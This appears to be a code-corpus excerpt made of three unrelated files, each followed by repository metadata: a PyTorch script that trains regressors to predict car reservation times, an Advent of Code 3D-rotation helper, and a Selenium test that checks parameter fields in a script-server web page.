valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
print(f'Time spent: {time.time()-time_start}')
print('\n\n')
##################################
### With all
##################################
print('----------------------------------------------')
print('---WITH ALL')
print('----------------------------------------------')
# Prep data
df = df_full.drop(columns = ['time'])
df['leave_fuel'] = df['leave_fuel']/100
df['degree'] = df['degree']/50
df['dist_to_station'] = df['dist_to_station']/5000
df[Weather_Scale.index] = (df[Weather_Scale.index] - Weather_Scale['Min'])/Weather_Scale['diff']
X_train = torch.tensor(df.iloc[cc[0]].to_numpy(dtype = 'float')).float()
y_train = torch.tensor(y.iloc[cc[0]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
X_val = torch.tensor(df.iloc[cc[1]].to_numpy(dtype = 'float')).float()
y_val = torch.tensor(y.iloc[cc[1]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
X_test = torch.tensor(df.iloc[cc[2]].to_numpy(dtype = 'float')).float()
y_test = torch.tensor(y.iloc[cc[2]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(273,16),
nn.ReLU(),
nn.Dropout(0.1),
nn.Linear(16,16),
nn.ReLU(),
nn.Dropout(0.1),
nn.Linear(16,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0001, weight_decay = 0.0001)
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/Full.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprob -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(273,32),
nn.ReLU(),
nn.Dropout(0.1),
nn.Linear(32,16),
nn.ReLU(),
nn.Dropout(0.1),
nn.Linear(16,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0001, weight_decay = 0.0001)
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/Full.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprob -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(273,128),
nn.ReLU(),
nn.Dropout(0.1),
nn.Linear(128,64),
nn.ReLU(),
nn.Dropout(0.1),
nn.Linear(64,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0001, weight_decay = 0.0001)
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/Full.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprob -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
print(f'Time spent: {time.time()-time_start}')
print('\n\n')
##################################
### With all and encoded
##################################
print('----------------------------------------------')
print('---WITH ALL AND ENCODED')
print('----------------------------------------------')
# Prep data
df = df_full.drop(columns = ['time'])
df['leave_fuel'] = df['leave_fuel']/100
df['degree'] = df['degree']/50
df['dist_to_station'] = df['dist_to_station']/5000
df[Weather_Scale.index] = (df[Weather_Scale.index] - Weather_Scale['Min'])/Weather_Scale['diff']
Mean_Zone_Times = dict(pd.DataFrame({'Zone': df.iloc[np.concatenate(cc[:2])].filter(regex = 'lz').idxmax(axis = 1).values, 'Time':y.iloc[np.concatenate(cc[:2])].values}).groupby('Zone').mean().squeeze())
df['Zone_E'] = df.filter(regex = 'lz').idxmax(1).map(Mean_Zone_Times)
df.drop(columns = df.filter(regex = 'lz'), inplace = True)
X_train = torch.tensor(df.iloc[cc[0]].to_numpy(dtype = 'float')).float()
y_train = torch.tensor(y.iloc[cc[0]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
X_val = torch.tensor(df.iloc[cc[1]].to_numpy(dtype = 'float')).float()
y_val = torch.tensor(y.iloc[cc[1]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
X_test = torch.tensor(df.iloc[cc[2]].to_numpy(dtype = 'float')).float()
y_test = torch.tensor(y.iloc[cc[2]].to_numpy(dtype = 'float')).float().unsqueeze(dim = 1)
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(18,16),
nn.ReLU(),
nn.Dropout(0.0),
nn.Linear(16,16),
nn.ReLU(),
nn.Dropout(0.0),
nn.Linear(16,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0001, weight_decay = 0.0001)
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/FullEncoded.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprob -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(18,32),
nn.ReLU(),
nn.Dropout(0.0),
nn.Linear(32,16),
nn.ReLU(),
nn.Dropout(0.0),
nn.Linear(16,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0001, weight_decay = 0.0001)
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/FullEncoded.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprob -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
# define network
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
def init_weights(m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_normal_(m.weight)
m.bias.data.fill_(0.01)
self.seq = nn.Sequential(
nn.Linear(18,128),
nn.ReLU(),
nn.Dropout(0.0),
nn.Linear(128,64),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(64,1),
)
self.seq.apply(init_weights)
def forward(self, x):
x = self.seq(x)
return x
net = Net()
print(net, sum(p.numel() for p in net.parameters()))
optimizer = optim.Adam(net.parameters(), lr=0.0001, weight_decay = 0.0001)
num_samples_train = X_train.shape[0]
num_batches_train = num_samples_train // batch_size
num_samples_valid = X_val.shape[0]
num_batches_valid = num_samples_valid // batch_size
# setting up lists for handling loss/accuracy
train_r2, train_loss = [], []
valid_r2, valid_loss = [], []
test_acc, test_loss = [], []
cur_loss = 0
train_losses = []
val_losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
path = 'Checkpoints/FullEncoded.pt'
early_stopping = EarlyStopping(patience=20, verbose=False, path = path)
for epoch in tqdm(range(num_epochs)):
# Forward -> Backprob -> Update params
## Train
cur_loss_train = 0
net.train()
for i in range(num_batches_train):
optimizer.zero_grad()
slce = get_slice(i, batch_size)
output = net(X_train[slce])
# compute gradients given loss
target_batch = y_train[slce]
batch_loss = r2_loss(output, target_batch)
batch_loss.backward()
optimizer.step()
cur_loss_train += batch_loss
train_losses.append(cur_loss_train/num_batches_train)
### Evaluate training
with torch.no_grad():
net.eval()
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size)
output = net(X_train[slce])
preds = output
train_targs += list(y_train[slce].numpy())
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
cur_loss_val = 0
for i in range(num_batches_valid):
slce = get_slice(i, batch_size)
output = net(X_val[slce])
preds = output
val_targs += list(y_val[slce].numpy())
val_preds += list(preds.data.numpy())
cur_loss_val += r2_loss(output, y_val[slce])
val_losses.append(cur_loss_val/num_batches_valid)
train_r2_cur = r2_score(train_targs, train_preds)
valid_r2_cur = r2_score(val_targs, val_preds)
train_r2.append(train_r2_cur)
valid_r2.append(valid_r2_cur)
# EarlyStopping
early_stopping(val_losses[-1], net)
if early_stopping.early_stop:
break
# Load best model
net.load_state_dict(torch.load(path))
net.eval()
print('Test R2:',r2_score(y_test.detach().numpy()[:,0],net.forward(X_test).detach().numpy()[:,0]))
df_clas['Preds'] = net.forward(X_test).detach().numpy()[:,0]
print('F1-score:',classification_report(df_clas.time_to_reservation > df_clas.Cut, df_clas.Preds > df_clas.Cut, target_names = ['Under','Over'], zero_division = 0, output_dict = True)['Over']['f1-score'])
print('\n')
print(f'Time spent: {time.time()-time_start}')
print('\n\n')
##################################
### End and exit stdout
##################################
sys.stdout.close() | 30.043657 | 204 | 0.607477 | 10,058 | 72,946 | 4.145953 | 0.029529 | 0.030216 | 0.025899 | 0.014245 | 0.95482 | 0.951319 | 0.950743 | 0.950743 | 0.948921 | 0.948106 | 0 | 0.021408 | 0.241809 | 72,946 | 2,428 | 205 | 30.043657 | 0.732566 | 0.062443 | 0 | 0.942451 | 0 | 0 | 0.044809 | 0.017814 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035891 | false | 0 | 0.008045 | 0 | 0.067451 | 0.063738 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
53f4e0c4df149ef7cedb611551f37bcf9aa6cd0e | 3,536 | py | Python | 2021/day19/points.py | alchzh/advent-of-code | 7b94d1ed3d775946f0445c1f97863f74120ed372 | [
"MIT"
] | null | null | null | 2021/day19/points.py | alchzh/advent-of-code | 7b94d1ed3d775946f0445c1f97863f74120ed372 | [
"MIT"
] | null | null | null | 2021/day19/points.py | alchzh/advent-of-code | 7b94d1ed3d775946f0445c1f97863f74120ed372 | [
"MIT"
] | null | null | null | from typing import NamedTuple
class Point(NamedTuple):
x: int
y: int
z: int
def __add__(s, o: "Point"):
return Point(s.x + o.x, s.y + o.y, s.z + o.z)
def __sub__(s, o: "Point"):
return Point(s.x - o.x, s.y - o.y, s.z - o.z)
def total(s):
return abs(s.x) + abs(s.y) + abs(s.z)
def rotate(s, o):
return rotations[o](s)
rotations = [
lambda p: Point(p.x, p.z, -p.y),
lambda p: Point(-p.z, p.x, -p.y),
lambda p: Point(-p.x, -p.z, -p.y),
lambda p: Point(p.z, -p.x, -p.y),
lambda p: Point(p.z, -p.y, p.x),
lambda p: Point(p.y, p.z, p.x),
lambda p: Point(-p.z, p.y, p.x),
lambda p: Point(-p.y, -p.z, p.x),
lambda p: Point(-p.y, p.x, p.z),
lambda p: Point(-p.x, -p.y, p.z),
lambda p: Point(p.y, -p.x, p.z),
lambda p: Point(p.x, p.y, p.z),
lambda p: Point(-p.z, -p.x, p.y),
lambda p: Point(p.x, -p.z, p.y),
lambda p: Point(p.z, p.x, p.y),
lambda p: Point(-p.x, p.z, p.y),
lambda p: Point(-p.x, p.y, -p.z),
lambda p: Point(-p.y, -p.x, -p.z),
lambda p: Point(p.x, -p.y, -p.z),
lambda p: Point(p.y, p.x, -p.z),
lambda p: Point(p.y, -p.z, -p.x),
lambda p: Point(p.z, p.y, -p.x),
lambda p: Point(-p.y, p.z, -p.x),
lambda p: Point(-p.z, -p.y, -p.x)
]
double_rotations = [
[18, 19, 16, 17, 7, 4, 5, 6, 1, 2, 3, 0, 10, 11, 8, 9, 15, 12, 13, 14, 21, 22, 23, 20],
[23, 20, 21, 22, 17, 18, 19, 16, 2, 3, 0, 1, 5, 6, 7, 4, 14, 15, 12, 13, 11, 8, 9, 10],
[9, 10, 11, 8, 22, 23, 20, 21, 3, 0, 1, 2, 19, 16, 17, 18, 13, 14, 15, 12, 6, 7, 4, 5],
[4, 5, 6, 7, 8, 9, 10, 11, 0, 1, 2, 3, 20, 21, 22, 23, 12, 13, 14, 15, 16, 17, 18, 19],
[14, 15, 12, 13, 11, 8, 9, 10, 5, 6, 7, 4, 2, 3, 0, 1, 23, 20, 21, 22, 17, 18, 19, 16],
[19, 16, 17, 18, 13, 14, 15, 12, 6, 7, 4, 5, 9, 10, 11, 8, 22, 23, 20, 21, 3, 0, 1, 2],
[1, 2, 3, 0, 18, 19, 16, 17, 7, 4, 5, 6, 15, 12, 13, 14, 21, 22, 23, 20, 10, 11, 8, 9],
[8, 9, 10, 11, 0, 1, 2, 3, 4, 5, 6, 7, 16, 17, 18, 19, 20, 21, 22, 23, 12, 13, 14, 15],
[22, 23, 20, 21, 3, 0, 1, 2, 9, 10, 11, 8, 6, 7, 4, 5, 19, 16, 17, 18, 13, 14, 15, 12],
[15, 12, 13, 14, 21, 22, 23, 20, 10, 11, 8, 9, 1, 2, 3, 0, 18, 19, 16, 17, 7, 4, 5, 6],
[5, 6, 7, 4, 14, 15, 12, 13, 11, 8, 9, 10, 23, 20, 21, 22, 17, 18, 19, 16, 2, 3, 0, 1],
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23],
[6, 7, 4, 5, 19, 16, 17, 18, 13, 14, 15, 12, 22, 23, 20, 21, 3, 0, 1, 2, 9, 10, 11, 8],
[11, 8, 9, 10, 5, 6, 7, 4, 14, 15, 12, 13, 17, 18, 19, 16, 2, 3, 0, 1, 23, 20, 21, 22],
[21, 22, 23, 20, 10, 11, 8, 9, 15, 12, 13, 14, 7, 4, 5, 6, 1, 2, 3, 0, 18, 19, 16, 17],
[16, 17, 18, 19, 20, 21, 22, 23, 12, 13, 14, 15, 8, 9, 10, 11, 0, 1, 2, 3, 4, 5, 6, 7],
[2, 3, 0, 1, 23, 20, 21, 22, 17, 18, 19, 16, 14, 15, 12, 13, 11, 8, 9, 10, 5, 6, 7, 4],
[7, 4, 5, 6, 1, 2, 3, 0, 18, 19, 16, 17, 21, 22, 23, 20, 10, 11, 8, 9, 15, 12, 13, 14],
[13, 14, 15, 12, 6, 7, 4, 5, 19, 16, 17, 18, 3, 0, 1, 2, 9, 10, 11, 8, 22, 23, 20, 21],
[20, 21, 22, 23, 12, 13, 14, 15, 16, 17, 18, 19, 4, 5, 6, 7, 8, 9, 10, 11, 0, 1, 2, 3],
[10, 11, 8, 9, 15, 12, 13, 14, 21, 22, 23, 20, 18, 19, 16, 17, 7, 4, 5, 6, 1, 2, 3, 0],
[3, 0, 1, 2, 9, 10, 11, 8, 22, 23, 20, 21, 13, 14, 15, 12, 6, 7, 4, 5, 19, 16, 17, 18],
[17, 18, 19, 16, 2, 3, 0, 1, 23, 20, 21, 22, 11, 8, 9, 10, 5, 6, 7, 4, 14, 15, 12, 13],
[12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]
] | 49.111111 | 91 | 0.44259 | 867 | 3,536 | 1.794694 | 0.05421 | 0.107969 | 0.18509 | 0.200514 | 0.90617 | 0.90617 | 0.90617 | 0.90617 | 0.90617 | 0.90617 | 0 | 0.362913 | 0.28931 | 3,536 | 72 | 92 | 49.111111 | 0.256267 | 0 | 0 | 0 | 0 | 0 | 0.002827 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.061538 | false | 0 | 0.015385 | 0.061538 | 0.2 | 0 | 0 | 0 | 1 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
9903920d07d527309675f8fa8e1d6d4b93b82a8c | 14,863 | py | Python | src/e2e_tests/sample_scripts/test_very_parametrized_script.py | brunomgalmeida/script-server | 13d7386532ceb437c8f128fb5ea6dba7eaaefa55 | [
"Apache-2.0",
"CC0-1.0"
] | 2 | 2021-12-18T00:11:25.000Z | 2022-01-13T16:19:30.000Z | src/e2e_tests/sample_scripts/test_very_parametrized_script.py | brunomgalmeida/script-server | 13d7386532ceb437c8f128fb5ea6dba7eaaefa55 | [
"Apache-2.0",
"CC0-1.0"
] | null | null | null | src/e2e_tests/sample_scripts/test_very_parametrized_script.py | brunomgalmeida/script-server | 13d7386532ceb437c8f128fb5ea6dba7eaaefa55 | [
"Apache-2.0",
"CC0-1.0"
] | 1 | 2022-03-14T15:44:15.000Z | 2022-03-14T15:44:15.000Z | from common.pages import VeryParametrizedScript
import allure
from common.pages import is_displayed, is_enabled, get_parent_element, get_underline_error_text, get_hidden_values_of_list, get_visible_values_of_list
from delayed_assert import expect, assert_expectations
from allure import severity, severity_level
import string
import random
import sys
from selenium.webdriver.common.keys import Keys
search_request = "lo"
@severity(severity_level.NORMAL)
@allure.title("Check presented elements in app section")
def test_elements_in_app_section(browser, config_host):
very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
very_parametrized_script_page.load()
expect(is_displayed(very_parametrized_script_page.script_description), "Script description not found")
expect(is_displayed(very_parametrized_script_page.script_parameters_panel), "Parameters panel not found")
expect(is_displayed(very_parametrized_script_page.button_execute), "Execute button not found")
expect(is_enabled(very_parametrized_script_page.button_execute), "Execute button not enabled")
assert_expectations()
@severity(severity_level.NORMAL)
@allure.title("Check presented parameters")
def test_params(browser, config_host):
very_parametrized_script_page = VeryParametrizedScript(browser, config_host)
expect(is_displayed(very_parametrized_script_page.parameter_simple_int), "Simple int param not found")
expect(is_displayed(very_parametrized_script_page.parameter_simple_boolean_label), "Simple boolean param not found")
expect(is_displayed(very_parametrized_script_page.parameter_simple_text), "Simple text param not found")
expect(is_displayed(very_parametrized_script_page.parameter_simple_list), "Simple list param not found")
expect(very_parametrized_script_page.parameter_file_upload is not None, "File upload param not found")
expect(is_displayed(very_parametrized_script_page.parameter_multiple_selection), "Multiple selection param not found")
expect(is_displayed(very_parametrized_script_page.parameter_required_text), "Required text param not found")
expect(is_displayed(very_parametrized_script_page.parameter_required_list), "Required list param not found")
expect(is_displayed(very_parametrized_script_page.parameter_constrained_int), "Constrained int param not found")
expect(is_displayed(very_parametrized_script_page.parameter_default_text), "Default text param not found")
expect(is_displayed(very_parametrized_script_page.parameter_default_boolean_label), "Default boolean param not found")
expect(is_displayed(very_parametrized_script_page.parameter_command_based_list), "Command based list param not found")
expect(is_displayed(very_parametrized_script_page.parameter_secure_list), "Secure list param not found")
expect(is_displayed(very_parametrized_script_page.parameter_secure_int), "Secure int param not found")
expect(is_displayed(very_parametrized_script_page.parameter_very_long_list), "Very long list param not found")
expect(is_displayed(very_parametrized_script_page.parameter_multiselect_as_secure_arguments), "Multiselect as secure arguments param not found")
expect(is_displayed(very_parametrized_script_page.parameter_dependant_list), "Dependant list param not found")
expect(is_displayed(very_parametrized_script_page.parameter_auth_username), "Auth username param not found")
expect(is_displayed(very_parametrized_script_page.parameter_any_ip), "Any IP param not found")
